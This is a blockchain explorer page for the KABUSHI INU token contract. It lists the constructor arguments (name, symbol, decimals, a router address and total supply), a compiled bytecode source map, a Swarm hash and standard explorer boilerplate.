00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000a37c5cf3db638d526f08520d6ffb3f68026daf580000000000000000000000000000000000000000000000000de0b6b3a7640000000000000000000000000000000000000000000000000000000000000000000b4b41425553484920494e5500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074b41425553484900000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): KABUSHI INU
Arg [1] : symbol_ (string): KABUSHI
Arg [2] : decimals_ (uint8): 9
Arg [3] : JellySwapRouter (address): 0xA37c5CF3dB638d526f08520D6FfB3F68026daf58
Arg [4] : totalSupply_ (uint256): 1000000000000000000
-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [3] : 000000000000000000000000a37c5cf3db638d526f08520d6ffb3f68026daf58
Arg [4] : 0000000000000000000000000000000000000000000000000de0b6b3a7640000
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [6] : 4b41425553484920494e55000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [8] : 4b41425553484900000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
13952:5118:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14784:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15903:210;;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;15903:210:0;1053:187:1;15085:108:0;15173:12;;15085:108;;;1391:25:1;;;1379:2;1364:18;15085:108:0;1245:177:1;18074:366:0;;;;;;:::i;:::-;;:::i;:::-;;16121:454;;;;;;:::i;:::-;;:::i;14986:91::-;15060:9;;14986:91;;15060:9;;;;2460:36:1;;2448:2;2433:18;14986:91:0;2318:184:1;15201:180:0;;;;;;:::i;:::-;-1:-1:-1;;;;;15352:21:0;15320:7;15352:21;;;:12;:21;;;;;;;15201:180;5592:94;;;:::i;4941:87::-;4987:7;5014:6;4941:87;;-1:-1:-1;;;;;5014:6:0;;;2844:51:1;;2832:2;2817:18;4941:87:0;2698:203:1;14883:95:0;;;:::i;15470:216::-;;;;;;:::i;:::-;;:::i;15694:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15860:18:0;;;15828:7;15860:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15694:201;5841:192;;;;;;:::i;:::-;;:::i;14044:35::-;;14078:1;14044:35;;14784:91;14829:13;14862:5;14855:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14784:91;:::o;15903:210::-;16022:4;16044:39;3735:10;16067:7;16076:6;16044:8;:39::i;:::-;-1:-1:-1;16101:4:0;15903:210;;;;;:::o;18074:366::-;15420:15;;-1:-1:-1;;;;;15420:15:0;3735:10;15420:31;15412:40;;;;;;-1:-1:-1;;;;;18274:21:0;::::1;18266:43;;;::::0;-1:-1:-1;;;18266:43:0;;3758:2:1;18266:43:0::1;::::0;::::1;3740:21:1::0;3797:1;3777:18;;;3770:29;-1:-1:-1;;;3815:18:1;;;3808:39;3864:18;;18266:43:0::1;;;;;;;;;18352:28;18364:16:::0;18352:8;:28:::1;:::i;:::-;18344:36;::::0;:5;:36:::1;:::i;:::-;-1:-1:-1::0;;;;;18320:21:0;::::1;;::::0;;;:12:::1;:21;::::0;;;;;:60;;;;18396:36;;::::1;::::0;::::1;::::0;18426:5;1391:25:1;;1379:2;1364:18;;1245:177;18396:36:0::1;;;;;;;;18074:366:::0;;;;;:::o;16121:454::-;16261:4;16278:36;16288:6;16296:9;16307:6;16278:9;:36::i;:::-;16325:220;16348:6;3735:10;16396:138;16452:6;16396:138;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16396:19:0;;;;;;:11;:19;;;;;;;;3735:10;16396:33;;;;;;;;;;:37;:138::i;:::-;16325:8;:220::i;:::-;-1:-1:-1;16563:4:0;16121:454;;;;;:::o;5592:94::-;4987:7;5014:6;-1:-1:-1;;;;;5014:6:0;3735:10;5161:23;5153:68;;;;-1:-1:-1;;;5153:68:0;;5774:2:1;5153:68:0;;;5756:21:1;;;5793:18;;;5786:30;5852:34;5832:18;;;5825:62;5904:18;;5153:68:0;5572:356:1;5153:68:0;5657:21:::1;5675:1;5657:9;:21::i;:::-;5592:94::o:0;14883:95::-;14930:13;14963:7;14956:14;;;;;:::i;15470:216::-;15592:4;15614:42;3735:10;15638:9;15649:6;15614:9;:42::i;5841:192::-;4987:7;5014:6;-1:-1:-1;;;;;5014:6:0;3735:10;5161:23;5153:68;;;;-1:-1:-1;;;5153:68:0;;5774:2:1;5153:68:0;;;5756:21:1;;;5793:18;;;5786:30;5852:34;5832:18;;;5825:62;5904:18;;5153:68:0;5572:356:1;5153:68:0;-1:-1:-1;;;;;5930:22:0;::::1;5922:73;;;::::0;-1:-1:-1;;;5922:73:0;;6135:2:1;5922:73:0::1;::::0;::::1;6117:21:1::0;6174:2;6154:18;;;6147:30;6213:34;6193:18;;;6186:62;-1:-1:-1;;;6264:18:1;;;6257:36;6310:19;;5922:73:0::1;5933:402:1::0;5922:73:0::1;6006:19;6016:8;6006:9;:19::i;:::-;5841:192:::0;:::o;9027:98::-;9085:7;9112:5;9116:1;9112;:5;:::i;:::-;9105:12;9027:98;-1:-1:-1;;;9027:98:0:o;18448:380::-;-1:-1:-1;;;;;18584:19:0;;18576:68;;;;-1:-1:-1;;;18576:68:0;;6675:2:1;18576:68:0;;;6657:21:1;6714:2;6694:18;;;6687:30;6753:34;6733:18;;;6726:62;-1:-1:-1;;;6804:18:1;;;6797:34;6848:19;;18576:68:0;6473:400:1;18576:68:0;-1:-1:-1;;;;;18663:21:0;;18655:68;;;;-1:-1:-1;;;18655:68:0;;7080:2:1;18655:68:0;;;7062:21:1;7119:2;7099:18;;;7092:30;7158:34;7138:18;;;7131:62;-1:-1:-1;;;7209:18:1;;;7202:32;7251:19;;18655:68:0;6878:398:1;18655:68:0;-1:-1:-1;;;;;18736:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18788:32;;1391:25:1;;;18788:32:0;;1364:18:1;18788:32:0;;;;;;;;18448:380;;;:::o;16583:622::-;-1:-1:-1;;;;;16723:20:0;;16715:70;;;;-1:-1:-1;;;16715:70:0;;7483:2:1;16715:70:0;;;7465:21:1;7522:2;7502:18;;;7495:30;7561:34;7541:18;;;7534:62;-1:-1:-1;;;7612:18:1;;;7605:35;7657:19;;16715:70:0;7281:401:1;16715:70:0;-1:-1:-1;;;;;16804:23:0;;16796:71;;;;-1:-1:-1;;;16796:71:0;;7889:2:1;16796:71:0;;;7871:21:1;7928:2;7908:18;;;7901:30;7967:34;7947:18;;;7940:62;-1:-1:-1;;;8018:18:1;;;8011:33;8061:19;;16796:71:0;7687:399:1;16796:71:0;16963:111;17002:6;16963:111;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16963:20:0;;;;;;:12;:20;;;;;;;:111;:24;:111::i;:::-;-1:-1:-1;;;;;16940:20:0;;;;;;;:12;:20;;;;;;:134;;;;17111:23;;;;;;;:35;;17139:6;17111:27;:35::i;:::-;-1:-1:-1;;;;;17085:23:0;;;;;;;:12;:23;;;;;;;:61;;;;17162:35;;;;;;;;;;17190:6;1391:25:1;;1379:2;1364:18;;1245:177;11306:240:0;11426:7;11487:12;11479:6;;;;11471:29;;;;-1:-1:-1;;;11471:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11522:5:0;;;11306:240::o;6041:173::-;6097:16;6116:6;;-1:-1:-1;;;;;6133:17:0;;;-1:-1:-1;;;;;;6133:17:0;;;;;;6166:40;;6116:6;;;;;;;6166:40;;6097:16;6166:40;6086:128;6041:173;:::o;14:597:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:173::-;684:20;;-1:-1:-1;;;;;733:31:1;;723:42;;713:70;;779:1;776;769:12;713:70;616:173;;;:::o;794:254::-;862:6;870;923:2;911:9;902:7;898:23;894:32;891:52;;;939:1;936;929:12;891:52;962:29;981:9;962:29;:::i;:::-;952:39;1038:2;1023:18;;;;1010:32;;-1:-1:-1;;;794:254:1:o;1427:553::-;1519:6;1527;1535;1543;1551;1604:3;1592:9;1583:7;1579:23;1575:33;1572:53;;;1621:1;1618;1611:12;1572:53;1644:29;1663:9;1644:29;:::i;:::-;1634:39;;1723:2;1712:9;1708:18;1695:32;1770:5;1763:13;1756:21;1749:5;1746:32;1736:60;;1792:1;1789;1782:12;1736:60;1427:553;;1815:5;;-1:-1:-1;;;;1867:2:1;1852:18;;1839:32;;1918:2;1903:18;;1890:32;;1969:3;1954:19;;;1941:33;;-1:-1:-1;1427:553:1:o;1985:328::-;2062:6;2070;2078;2131:2;2119:9;2110:7;2106:23;2102:32;2099:52;;;2147:1;2144;2137:12;2099:52;2170:29;2189:9;2170:29;:::i;:::-;2160:39;;2218:38;2252:2;2241:9;2237:18;2218:38;:::i;:::-;2208:48;;2303:2;2292:9;2288:18;2275:32;2265:42;;1985:328;;;;;:::o;2507:186::-;2566:6;2619:2;2607:9;2598:7;2594:23;2590:32;2587:52;;;2635:1;2632;2625:12;2587:52;2658:29;2677:9;2658:29;:::i;2906:260::-;2974:6;2982;3035:2;3023:9;3014:7;3010:23;3006:32;3003:52;;;3051:1;3048;3041:12;3003:52;3074:29;3093:9;3074:29;:::i;:::-;3064:39;;3122:38;3156:2;3145:9;3141:18;3122:38;:::i;:::-;3112:48;;2906:260;;;;;:::o;3171:380::-;3250:1;3246:12;;;;3293;;;3314:61;;3368:4;3360:6;3356:17;3346:27;;3314:61;3421:2;3413:6;3410:14;3390:18;3387:38;3384:161;;;3467:10;3462:3;3458:20;3455:1;3448:31;3502:4;3499:1;3492:15;3530:4;3527:1;3520:15;3384:161;;3171:380;;;:::o;3893:127::-;3954:10;3949:3;3945:20;3942:1;3935:31;3985:4;3982:1;3975:15;4009:4;4006:1;3999:15;4025:422;4114:1;4157:5;4114:1;4171:270;4192:7;4182:8;4179:21;4171:270;;;4251:4;4247:1;4243:6;4239:17;4233:4;4230:27;4227:53;;;4260:18;;:::i;:::-;4310:7;4300:8;4296:22;4293:55;;;4330:16;;;;4293:55;4409:22;;;;4369:15;;;;4171:270;;;4175:3;4025:422;;;;;:::o;4452:806::-;4501:5;4531:8;4521:80;;-1:-1:-1;4572:1:1;4586:5;;4521:80;4620:4;4610:76;;-1:-1:-1;4657:1:1;4671:5;;4610:76;4702:4;4720:1;4715:59;;;;4788:1;4783:130;;;;4695:218;;4715:59;4745:1;4736:10;;4759:5;;;4783:130;4820:3;4810:8;4807:17;4804:43;;;4827:18;;:::i;:::-;-1:-1:-1;;4883:1:1;4869:16;;4898:5;;4695:218;;4997:2;4987:8;4984:16;4978:3;4972:4;4969:13;4965:36;4959:2;4949:8;4946:16;4941:2;4935:4;4932:12;4928:35;4925:77;4922:159;;;-1:-1:-1;5034:19:1;;;5066:5;;4922:159;5113:34;5138:8;5132:4;5113:34;:::i;:::-;5183:6;5179:1;5175:6;5171:19;5162:7;5159:32;5156:58;;;5194:18;;:::i;:::-;5232:20;;4452:806;-1:-1:-1;;;4452:806:1:o;5263:131::-;5323:5;5352:36;5379:8;5373:4;5352:36;:::i;5399:168::-;5439:7;5505:1;5501;5497:6;5493:14;5490:1;5487:21;5482:1;5475:9;5468:17;5464:45;5461:71;;;5512:18;;:::i;:::-;-1:-1:-1;5552:9:1;;5399:168::o;6340:128::-;6380:3;6411:1;6407:6;6404:1;6401:13;6398:39;;;6417:18;;:::i;:::-;-1:-1:-1;6453:9:1;;6340:128::o
Swarm Source
ipfs://0d69a4ec78750f86354957a70ffe33296299ef198f4bfe6edee43c52cfbd4196
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.